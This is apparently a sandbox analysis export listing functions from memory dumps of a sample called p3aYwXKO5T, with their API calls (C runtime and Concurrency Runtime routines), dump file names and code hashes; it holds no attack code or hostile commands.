API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
Instruction ID: 0570bf0f05b66f9ed4c069c76b970afc5d396f79173978975bd258ee71526387
Opcode Fuzzy Hash: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
Instruction Fuzzy Hash: F821B0B160463DAFDB20AF65DC80E6BB7AEEF043A57004528EC2D97640D771ED409BA0

Function 0043D94F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 004369CC: _free.LIBCMT ref: 004369DA

Part of subcall function 0043E926: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444DC0,?,00000000,00000000), ref: 0043E9C8

GetLastError.KERNEL32 ref: 0043D9B7
__dosmaperr.LIBCMT ref: 0043D9BE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043D9FD
__dosmaperr.LIBCMT ref: 0043DA04

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e64aadb6d22fe51e849137b99b89815b7d15ae6c09361cf92410591095803afc
Instruction ID: ee20851a037b4c6b58bdbb56dc4c6e04abe5cdf536cd6285cafdd1b842c948ea
Opcode Fuzzy Hash: e64aadb6d22fe51e849137b99b89815b7d15ae6c09361cf92410591095803afc
Instruction Fuzzy Hash: DB21FBF1A04605BFDB206F66AC80E2777ACEF0C368F10511AF86997251D738EC418799

Function 02351A91 Relevance: 6.1, APIs: 4, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02351AEC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02351B0B
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 02351B52

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 1284976207-0
Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction ID: 918a79266a3cb07e0a54fbe2fdc18a38d22dae2c2f469535bb1ce81b95663be1
Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction Fuzzy Hash: 1A212935700A359BCB19AB28C494FAD73A5BF80334F04055AED1E872D1EF64E841CAD4

Function 02350CFF Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 02350D50
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 02350D38

Part of subcall function 02349196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 023491B7

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 02350DB3
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 02350DB8

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction ID: 1bb5785c7a6ce07fa8cf1fe7b7c95cbec277b6935e8a1689322cc9cd6f1119be
Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction Fuzzy Hash: 5521D479700224AFCB24EB58CC44E6EB7FDEB48360B040556EA16A32A1DB71BD01CEA5

Function 00430A98 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 00430AE9
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430AD1

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430B4C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 00430B51

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction ID: eb585ae1b4d53eae47272984182226d4372f2576b54a2ee7974d2067b554b9fa
Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction Fuzzy Hash: 54210475700224AFCB10EB59DC45D7EB7A8EF48324F15015BFA16A3292CB74AD018AA9

Function 00429C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00429C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429CE8
std::bad_exception::bad_exception.LIBCMT ref: 00429CFE
std::bad_exception::bad_exception.LIBCMT ref: 00429D6A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: a17e9912f2dd60cabb5880328a5218807bfb4b16fff09030fc9fe1e3d2418584
Instruction ID: e4f0000fdf8db68e5cd6af660122ebbf79e84cae44bb9f1680ea774d3ebdc29a
Opcode Fuzzy Hash: a17e9912f2dd60cabb5880328a5218807bfb4b16fff09030fc9fe1e3d2418584
Instruction Fuzzy Hash: 7F21C471A001249FCB04EF65E4829DEB7B0AF05314FA0406BF401AB2A2DB396D45DB69

Function 0235B3E4 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction ID: 6401b520ab6360a09055dcb9c5d12966417317d56e04cdc0b9b2ed871a7501a7
Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction Fuzzy Hash: 0221D5B1B45334BBCB318B649C45F2AB76A9F117A8F110621FC4DA76A6D730ED00C6E4

Function 02345109 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 02345168
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0234518B
__EH_prolog3.LIBCMT ref: 023451A6
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 023451CD

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 2642201467-0
Opcode ID: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
Instruction ID: b7f3492a2727ce36aca5cc40122463908da6a2feb8c30d96d9526c88cef3be40
Opcode Fuzzy Hash: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
Instruction Fuzzy Hash: 7B21B035A00209AFCB24EF58C840AAD77F6FF48311F5040AAE9059B691DF71BA02CF54

Function 02351599 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0235162D
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 023515DE

Part of subcall function 02348582: SafeRWList.LIBCONCRT ref: 02348593

SafeRWList.LIBCONCRT ref: 02351623
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 02351643

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
Instruction ID: 839391393a89e3a7841660213acf43de601743f03e0e38cff9df2f85679d579b
Opcode Fuzzy Hash: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
Instruction Fuzzy Hash: F721C27160020A9FCB04DF24C880FA5FBEABF84318F54D6A6D80E4B542DB75E695CBC0

Function 00431332 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004313C6
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431377

Part of subcall function 0042831B: SafeRWList.LIBCONCRT ref: 0042832C

SafeRWList.LIBCONCRT ref: 004313BC
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 004313DC

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
Instruction ID: d9e605bbb79d098c531deca9cf4cd80c541eae854b845806876d4496965d449b
Opcode Fuzzy Hash: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
Instruction Fuzzy Hash: 7521F53160020ADFC704CF24C881FA5F7E8FB48718F54E2ABD8054B552DB39E98ACB94

Function 0235621E Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
Instruction ID: 8a85506011aab1e401381770b635bd4653dbc1375bb0c04e3021c7c0411b9e51
Opcode Fuzzy Hash: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
Instruction Fuzzy Hash: 9F110835E11735ABDB228F649C86F2A376C9F017A0F500621EC0AA7391D770ED00CEE0

Function 0233F554 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0233F576

Part of subcall function 0233F732: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 023456ED

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0233F597

Part of subcall function 02340419: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02340435

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0233F5B3
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0233F5BA

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction ID: 856ded2de1d2231c490d38b629906855dcabbffd710ae750a5bf8e9e7bbef96d
Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction Fuzzy Hash: 350100B29003057BEB327F69CC80CABBBADDF10744B90452BF85692581D770A7048AA1

Function 0041F2ED Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F30F

Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F330

Part of subcall function 004201B2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004201CE

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F34C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F353

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction ID: fbdee06be22d7eb5cf524bde3a8873450c2cdba4fa94e97b4615b2f8ae6f40be
Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction Fuzzy Hash: 9C012B71500309BBD720AF66CC859DBFBA8EF10358B10453FFC1492152D778E98A87A9

Function 02353628 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02353642
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 02353656
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 0235366E
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 02353686

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 8ccf7810d54d4b9ad151c8941fb9713d7e7c0e2cef901c6a165dc4d3a158feb5
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 1601DB3260012467CF26AE558880EAFB7EEDF44390F000099EC19A7341DA70ED118EE1

Function 004333C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004333DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004333EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043341F

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 148698cb8657f3ab7a0d111eac04cd811a00bb0e29ba6abd34784ed5a644fba4
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 74012632700524A7CF16EF658841AAFB7A99F58314F00001BFC12EB382DA74EE1193A5

Function 0235BAA2 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0235BC07,00000000,?,02362212,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0235BAB8
GetLastError.KERNEL32(?,02362212,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0235BC07,00000000,00000104,?), ref: 0235BAC2
__dosmaperr.LIBCMT ref: 0235BAC9

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction ID: 0075136f7d5da9f430808c74de8699ad6d68ce67eb64156aa77a12e5e5adb30f
Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction Fuzzy Hash: 33F01D32600A25BB8B215FA6DC08D66FF6AFF443A57058521F92DC7424E731E851CBE0

Function 0235BB0B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0235BC07,00000000,?,0236219D,00000000,00000000,0235BC07,?,?,00000000,00000000,00000001), ref: 0235BB21
GetLastError.KERNEL32(?,0236219D,00000000,00000000,0235BC07,?,?,00000000,00000000,00000001,00000000,00000000,?,0235BC07,00000000,00000104), ref: 0235BB2B
__dosmaperr.LIBCMT ref: 0235BB32

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction ID: 553729480e8a9619b356130c9574dbf50f87b333633b730708e0d28ccf19754a
Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction Fuzzy Hash: 33F01D32600A25BB8B215FA2DC09D5AFF6BFF443A57008525E92DC7424DB72E851CBD4

Function 0043B83B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0043B9A0,00000000,?,00441FAB,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B851
GetLastError.KERNEL32(?,00441FAB,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B9A0,00000000,00000104,?), ref: 0043B85B
__dosmaperr.LIBCMT ref: 0043B862

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction ID: 4d38e234b28d8319e4134ca970a631ac6953b460d6f58f575e06abf1e175f512
Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction Fuzzy Hash: 51F06D36600615BBCB246FA6DC08E4BBF6DFF483A1B009126F61DC6521D735E811CBD8

Function 0043B8A4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0043B9A0,00000000,?,00441F36,00000000,00000000,0043B9A0,?,?,00000000,00000000,00000001), ref: 0043B8BA
GetLastError.KERNEL32(?,00441F36,00000000,00000000,0043B9A0,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B9A0,00000000,00000104), ref: 0043B8C4
__dosmaperr.LIBCMT ref: 0043B8CB

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction ID: fe454a788940d8d1b6a18dc845ad3b04fffb8540f5c3b85414d994226db15d49
Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction Fuzzy Hash: 26F06D72600619BB8B216BA6DC08B57BF69FF483A0B009526FA19C6521D739E861C7D8

Function 0234526C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 023401CD: TlsGetValue.KERNEL32(?,?,0233F74E,0233F57B,?,?), ref: 023401D3

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02345296

Part of subcall function 0234E575: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0234E59C
Part of subcall function 0234E575: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0234E5B5
Part of subcall function 0234E575: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0234E62B
Part of subcall function 0234E575: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0234E633

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 023452A4
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 023452AE
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 023452B8

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction ID: e86b51268000a0ffef3530fac02c387ec8bf3c44921e5e072735746b948056aa
Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction Fuzzy Hash: F2F0F635F0062467CB35B6258C10A6DB7E7AF91B50F4001EAE91153290DF64FA058FC2

Function 00425005 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041FF66: TlsGetValue.KERNEL32(?,?,0041F4E7,0041F314,?,?), ref: 0041FF6C

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042502F

Part of subcall function 0042E30E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E335
Part of subcall function 0042E30E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E34E
Part of subcall function 0042E30E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E3C4
Part of subcall function 0042E30E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E3CC

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042503D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425047
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425051

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction ID: 591bd9b18c1ea594323a38232f6cf7a467bdae74b08f21c6b28571b33805ae9f
Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction Fuzzy Hash: 2DF0F63170053927CA25B727E81286EF6659F91B58B80002FF91057252EF7C9E498BCE

Function 0233C86B Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0233FB78
Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0233FBAB
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0233FBB7
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0233FBC0

Part of subcall function 0233F554: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0233F576
Part of subcall function 0233F554: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0233F597

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

